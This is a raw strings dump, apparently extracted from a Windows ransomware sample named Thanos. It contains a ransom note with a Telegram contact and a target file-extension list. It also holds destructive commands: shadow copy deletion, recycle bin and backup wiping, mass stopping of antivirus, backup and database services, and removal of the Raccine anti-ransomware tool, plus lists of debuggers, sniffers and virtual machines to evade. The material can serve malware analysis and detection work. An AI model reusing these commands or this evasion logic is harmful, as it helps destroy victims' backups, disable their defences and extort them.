NO YES Set-MpPreference -EnableControlledFolderAccess Disabled \ cmd.exe /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin /c rd /s /q D:\\$Recycle.bin netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes II55E98VDR9DBQ3LSD5W1JLWAJN7SWBM Client IP: http://icanhazip.com Date of encryption: Client Unique Identifier Key: Additional KeyID: Error while creating Local Report: Installer... Ctrl+Shift+X [auto] dat txt jpeg gif jpg png php cs cpp rar zip html htm xlsx xls avi mp4 ppt doc docx sxi sxw odt hwp tar bz2 mkv eml msg ost pst edb sql accdb mdb dbf odb myd java pas asm key pfx pem p12 csr gpg aes vsd odg raw nef svg psd vmx vmdk vdi lay6 sqlite3 sqlitedb class mpeg djvu tiff backup pdf cert docm xlsm dwg bak qbw nd tlg lgb pptx mov xdw ods wav mp3 aiff flac m4a csv ora mdf ldf ndf dtsx rdl dim mrimg qbb rtf 7z .y9sx7x Finish process: \RESTORE_FILES_INFO.txt Your files are secured... If you wanna your files back write in Telegram @Lockthesystem Key Identifier: Number of files that were processed is: PC Hardware ID: Additional KeyId: \RESTORE_FILES_INFO.hta MESSAGERICH

Key Identifier:

URL USERNAME ACCESO Possible affected files: notepad.exe mshta.exe All Done! EVET This program requires Microsoft .NET Framework v. 4.82 or superior to run properly Atention! C:\Program Files\ C:\Program Files (x86)\ :\Windows\ perflogs internet explorer :\ProgramData\ :\AppData\ msocache system volume information boot tor browser mozilla appdata google chrome application data autoexec.bat desktop.ini autorun.inf ntuser.dat NTUSER.DAT iconcache.db bootsect.bak boot.ini ntuser.dat.log thumbs.db bootmgr pagefile.sys config.sys ntuser.ini Builder_Log RSAKeys Config.enc RESTORE_FILES_INFO exe dll EXE DLL Recycle.Bin powershell powershell.exe & SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options vssadmin.exe wmic.exe wbadmin.exe bcdedit.exe diskshadow.exe net.exe SYSTEM\CurrentControlSet\Services\EventLog\Application Raccine =UkUBdFVG90U taskkill /F /IM RaccineSettings.exe cmVn delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F delete HKCU\Software\Raccine /F schtasks /DELETE /TN "Raccine Rules Updater" /F GotAllDone SYSTEM\CurrentControlSet\Control\FileSystem LongPathsEnabled /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s” /C choice /C Y /N /D Y /T 3 & Del " File: - Error while removing readonly attribute: 95 2222A 98SE 98 Me NT 3.51 NT 4.0 2000 XP Vista 7 8 8.1 10 Windows Error while writing Temp Folder Report: C:\ . .. .part - Error while fully writing to file: sc.exe net.exe taskkill.exe /IM /f vssadmin.exe del.exe icacls 100000000 0 lsass.exe svchst.exe crcss.exe chrome32.exe firefox.exe calc.exe mysqld.exe dllhst.exe opera32.exe memop.exe spoolcv.exe ctfmom.exe SkypeApp.exe 04a02176-5f34-46cc-9136-cc5f8be7fd52 start Dnscache /y start FDResPub /y start SSDPSRV /y start upnphost /y stop avpsus /y stop McAfeeDLPAgentService /y stop mfewc /y stop BMR Boot Service /y stop NetBackup BMR MTFTP Service /y stop DefWatch /y stop ccEvtMgr /y stop ccSetMgr /y stop SavRoam /y stop RTVscan /y stop QBFCService /y stop QBIDPService /y stop Intuit.QuickBooks.FCS /y stop QBCFMonitorService /y stop YooBackup /y stop YooIT /y stop zhudongfangyu /y stop stc_raw_agent /y stop VSNAPVSS /y stop VeeamTransportSvc /y stop VeeamDeploymentService /y stop VeeamNFSSvc /y stop veeam /y stop PDVFSService /y stop BackupExecVSSProvider /y stop BackupExecAgentAccelerator /y stop BackupExecAgentBrowser /y stop BackupExecDiveciMediaService /y stop BackupExecJobEngine /y stop BackupExecManagementService /y stop BackupExecRPCService /y stop AcrSch2Svc /y stop AcronisAgent /y stop CASAD2DWebSvc /y stop CAARCUpdateSvc /y stop sophos /y stop “Acronis VSS Provider” /y stop MsDtsServer /y stop IISAdmin /y stop MSExchangeES /y stop “Sophos Agent” /y stop EraserSvc11710 /y stop “Enterprise Client Service” /y stop “SQL Backups /y stop MsDtsServer100 /y stop NetMsmqActivator /y stop MSExchangeIS /y stop “Sophos AutoUpdate Service” /y stop SamSs /y stop ReportServer /y stop “SQLsafe Backup Service” /y stop MsDtsServer110 /y stop POP3Svc /y stop MSExchangeMGMT /y stop “Sophos Clean Service” /y stop SMTPSvc /y stop ReportServer$SQL_2008 /y stop “SQLsafe Filter Service” /y stop msftesql$PROD /y stop SstpSvc /y stop MSExchangeMTA /y stop “Sophos Device Control Service” /y stop ReportServer$SYSTEM_BGC /y stop “Symantec System Recovery” /y stop MSOLAP$SQL_2008 /y stop UI0Detect /y stop MSExchangeSA /y stop “Sophos File Scanner Service” /y stop ReportServer$TPS /y stop “Veeam Backup Catalog Data Service” /y stop MSOLAP$SYSTEM_BGC /y stop W3Svc /y stop MSExchangeSRS /y stop “Sophos Health Service” /y stop ReportServer$TPSAMA /y stop “Zoolz 2 Service” /y stop MSOLAP$TPS /y stop “aphidmonitorservice” /y stop msexchangeadtopology /y stop “Sophos MCS Agent” /y stop MSOLAP$TPSAMA /y stop “intel(r) proset monitoring service” /y stop msexchangeimap4 /y stop “Sophos MCS Client” /y stop ARSM /y stop MSSQL$BKUPEXEC /y stop unistoresvc_1af40a /y stop “Sophos Message Router” /y stop MSSQL$ECWDB2 /y stop audioendpointbuilder /y stop “Sophos Safestore Service” /y stop MSSQL$PRACTICEMGT /y stop “Sophos System Protection Service” /y stop BackupExecDeviceMediaService /y stop MSSQL$PRACTTICEBGC /y stop “Sophos Web Control Service” /y stop MSSQL$PROD /y stop MSSQL$PROFXENGAGEMENT /y stop Antivirus /y stop MSSQL$SBSMONITORING / stop MSSQL$SBSMONITORING /y stop AVP /y stop MSSQL$SHAREPOINT /y stop DCAgent /y stop bedbg /y stop MSSQL$SQL_2008 /y stop EhttpSrv /y stop MMS /y stop MSSQL$SQLEXPRESS /y stop ekrn /y stop mozyprobackup /y stop MSSQL$SYSTEM_BGC /y stop EPSecurityService /y stop MSSQL$VEEAMSQL2008R2 /y stop MSSQL$TPS /y stop EPUpdateService /y stop ntrtscan /y stop MSSQL$TPSAMA /y stop EsgShKernel /y stop ESHASRV /y stop SDRSVC /y stop MSSQL$VEEAMSQL2012 /y stop FA_Scheduler /y stop SQLAgent$VEEAMSQL2008R2 /y stop MSSQLFDLauncher$PROFXENGAGEMENT /y stop KAVFS /y stop SQLWriter /y stop MSSQLFDLauncher$SBSMONITORING /y stop KAVFSGT /y stop VeeamBackupSvc /y stop MSSQLFDLauncher$SHAREPOINT /y stop kavfsslp /y stop VeeamBrokerSvc /y stop MSSQLFDLauncher$SQL_2008 /y stop klnagent /y stop VeeamCatalogSvc /y stop MSSQLFDLauncher$SYSTEM_BGC /y stop macmnsvc /y stop VeeamCloudSvc /y stop MSSQLFDLauncher$TPS /y stop masvc /y stop MSSQLFDLauncher$TPSAMA /y stop MBAMService /y stop VeeamDeploySvc /y stop MSSQLSERVER /y stop MBEndpointAgent /y stop VeeamEnterpriseManagerSvc /y stop MSSQLServerADHelper /y stop McAfeeEngineService /y stop VeeamHvIntegrationSvc /y stop MSSQLServerADHelper100 /y stop McAfeeFramework /y stop VeeamMountSvc /y stop MSSQLServerOLAPService /y stop McAfeeFrameworkMcAfeeFramework /y stop MySQL57 /y stop McShield /y stop VeeamRESTSvc /y stop MySQL80 /y stop McTaskManager /y stop OracleClientCache80 /y stop mfefire /y stop wbengine /y stop mfemms /y stop RESvc /y stop mfevtp /y stop sms_site_sql_backup /y stop SQLAgent$BKUPEXEC /y stop MSSQL$SOPHOS /y stop SQLAgent$CITRIX_METAFRAME /y stop sacsvr /y stop SQLAgent$CXDB /y stop SAVAdminService /y stop SQLAgent$ECWDB2 /y stop SAVService /y stop SQLAgent$PRACTTICEBGC /y stop SepMasterService /y stop SQLAgent$PRACTTICEMGT /y stop ShMonitor /y stop SQLAgent$PROD /y stop Smcinst /y stop SQLAgent$PROFXENGAGEMENT /y stop SmcService /y stop SQLAgent$SBSMONITORING /y stop SntpService /y stop SQLAgent$SHAREPOINT /y stop sophossps /y stop SQLAgent$SQL_2008 /y stop SQLAgent$SOPHOS /y stop SQLAgent$SQLEXPRESS /y stop svcGenericHost /y stop SQLAgent$SYSTEM_BGC /y stop swi_filter /y stop SQLAgent$TPS /y stop swi_service /y stop SQLAgent$TPSAMA /y stop swi_update /y stop swi_update_64 /y stop SQLAgent$VEEAMSQL2012 /y stop TmCCSF /y stop SQLBrowser /y stop tmlisten /y stop SQLSafeOLRService /y stop TrueKey /y stop SQLSERVERAGENT /y stop TrueKeyScheduler /y stop SQLTELEMETRY /y stop TrueKeyServiceHelper /y stop SQLTELEMETRY$ECWDB2 /y stop WRSVC /y stop mssql$vim_sqlexp /y stop vapiendpoint /y config Dnscache start= auto config FDResPub start= auto config SSDPSRV start= auto config upnphost start= auto config SQLTELEMETRY start= disabled config SQLTELEMETRY$ECWDB2 start= disabled config SQLWriter start= disabled config SstpSvc start= disabled /IM mspub.exe /F /IM mydesktopqos.exe /F /IM mydesktopservice.exe /F /IM mysqld.exe /F /IM sqbcoreservice.exe /F /IM firefoxconfig.exe /F /IM agntsvc.exe /F /IM thebat.exe /F /IM steam.exe /F /IM encsvc.exe /F /IM excel.exe /F /IM CNTAoSMgr.exe /F /IM sqlwriter.exe /F /IM tbirdconfig.exe /F /IM dbeng50.exe /F /IM thebat64.exe /F /IM ocomm.exe /F /IM infopath.exe /F /IM mbamtray.exe /F /IM zoolz.exe /F IM thunderbird.exe /F /IM dbsnmp.exe /F /IM xfssvccon.exe /F /IM Ntrtscan.exe /F /IM isqlplussvc.exe /F /IM onenote.exe /F /IM PccNTMon.exe /F /IM msaccess.exe /F /IM outlook.exe /F /IM tmlisten.exe /F /IM msftesql.exe /F /IM powerpnt.exe /F /IM visio.exe /F /IM winword.exe /F /IM mysqld-nt.exe /F /IM wordpad.exe /F /IM mysqld-opt.exe /F /IM ocautoupds.exe /F /IM ocssd.exe /F /IM oracle.exe /F /IM sqlagent.exe /F /IM sqlbrowser.exe /F /IM sqlservr.exe /F /IM synctime.exe /F Delete Shadows /all /quiet resize shadowstorage /for=c: /on=c: /maxsize=401MB resize shadowstorage /for=c: /on=c: /maxsize=unbounded resize shadowstorage /for=d: /on=d: /maxsize=401MB resize shadowstorage /for=d: /on=d: /maxsize=unbounded resize shadowstorage /for=e: /on=e: /maxsize=401MB resize shadowstorage /for=e: /on=e: /maxsize=unbounded resize shadowstorage /for=f: /on=f: /maxsize=401MB resize shadowstorage /for=f: /on=f: /maxsize=unbounded resize shadowstorage /for=g: /on=g: /maxsize=401MB resize shadowstorage /for=g: /on=g: /maxsize=unbounded resize shadowstorage /for=h: /on=h: /maxsize=401MB resize shadowstorage /for=h: /on=h: /maxsize=unbounded Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); } /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk "C:*" /grant Everyone:F /T /C /Q "D:*" /grant Everyone:F /T /C /Q "Z:*" /grant Everyone:F /T /C /Q 1 LOGONISOFF mystartup.lnk Thanos Debug_Log.txt UserName= _MachineName= _ .txt .[ID- ] 150e8ef3f1b0d5b5b2af2ffc8d540cb0e36ecdcaf5001bab2f318e36a3c25302.exe Client-0[1].exe c.sh ram2021.exe ransom.js str.b64 str.txt program files windows programdata - Error while reading if filesize is zero: - Error while renaming to crypted extension: tasklist /v /fo csv /f /pid UTF-8 <------------> xp Select 150e8ef3f1b0d5b5b2af2ffc8d540cb0e36ecdcaf5001bab2f318e36a3c25302.exe Client-0[1].exe c.sh ram2021.exe ransom.js str.b64 str.txt from Win32_ComputerSystem Manufacturer microsoft corporation Model VIRTUAL vmware VirtualBox SbieDll.dll wallpaper.bmp Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr win32_processor processorID C win32_logicaldisk.deviceid=" :" VolumeSerialNumber STOR Global\ Data are empty data Maximum data length is {0} Key size is not valid keySize Key is null or empty publicKeyXml ! 2048!vtkNRxrJxDw63Cjj0789Jy9RwLwwlOsOJsf+u6g7sgzWtM9Qa9VaAVzU/XKIuLilvyDhrEYqlPkpwF6PQvQrkSIAPUiVWSfsFhSrdfeskxvj5dn5saUuoLzMYzcBx38UPFOVQm6jm6unpBwVFMdZ/uwf2LY9nMhbgtj0+B71wYj1Be8l1eXAuaGHw3D3MY60WeEqFhJcgLgYPWAovvHH9o3VxqHxiClKqn5OQH6ym/ILY93sHucakfyha7PY4M/Hum3ZnDyWbjT9twnBtxfkvYVINPKN0SJiDYczhGt5a8Xl86YSFPRiKOYsN7NTfRy3Qqnyr4kz3l3cgXqj4btkUw==AQABvalue rgbKey Invalid key size; it must be 128 or 256 bits. rgbIV Invalid IV size; it must be 8 bytes. inputBuffer inputOffset inputCount outputBuffer outputOffset expand 32-byte k expand 16-byte k - Error while reading from file: - + - Error while partial writing to file: CreateShortcut Error while creating ShortCut: WScript.Shell http analyzer stand-alone fiddler effetech http sniffer firesheep IEWatch Professional dumpcap wireshark wireshark portable sysinternals tcpview NetworkMiner NetworkTrafficView HTTPNetworkSniffer tcpdump intercepter Intercepter-NG ollydbg x64dbg x32dbg dnspy dnspy-x86 de4dot ilspy dotpeek dotpeek64 ida64 RDG Packer Detector CFF Explorer PEiD protection_id LordPE pe-sieve MegaDumper UnConfuserEx Universal_Fixer NoFuserEx chrome opera msedge iexplore firefox explorer wininit winlogon SearchApp SearchIndexer SearchUI